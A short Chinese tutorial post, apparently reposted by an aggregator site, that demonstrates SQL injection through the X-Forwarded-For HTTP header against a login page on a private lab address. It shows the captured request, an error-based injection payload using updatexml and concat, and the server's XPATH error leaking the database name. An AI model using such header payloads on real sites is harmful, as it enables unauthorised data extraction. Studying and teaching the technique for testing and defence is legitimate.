http头部注入

http头部注入

我们首先可以在浏览器设置手动代理模式，然后通过burpsuite进行代理配置后进行抓包，如下是一个网站登录页面的http头部信息：

POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.120.137/baji/login.php Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05 DNT: 1 X-Forwarded-For: 8.8.8.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29username=admin&password=admin

因为我们这个网站代码中的ip字段和数据库中有交互，所以我们可以通过http头部信息中的X-Forwarded-For字段进行注入，注入代码如下：

POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.120.137/baji/login.php Cookie: PHPSESSID=0minmo2e9at6uucdton5udeg05 DNT: 1 X-Forwarded-For: 8.8.'and updatexml(1,(concat(0x23,database(),0x23)),3) and'.8 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29username=admin&password=admin

服务器的回应：

HTTP/1.1 200 OK Date: Tue, 25 Jun 2019 11:05:32 GMT Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45 X-Powered-By: PHP/5.4.45 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 46 Connection: close Content-Type: text/html;charset=utf-8查询日志出错XPATH syntax error: '#baji#'

error后面的baji就是我们想要的结果。
这就是我理解的http头部注入的原理，http头部注入的前提是头部字段中的数据要与数据库产生交互，然后把你的注入代码组合到相应的字段里。

总结

以上是生活随笔为你收集整理的http头部注入的全部内容，希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错，欢迎将生活随笔推荐给好友。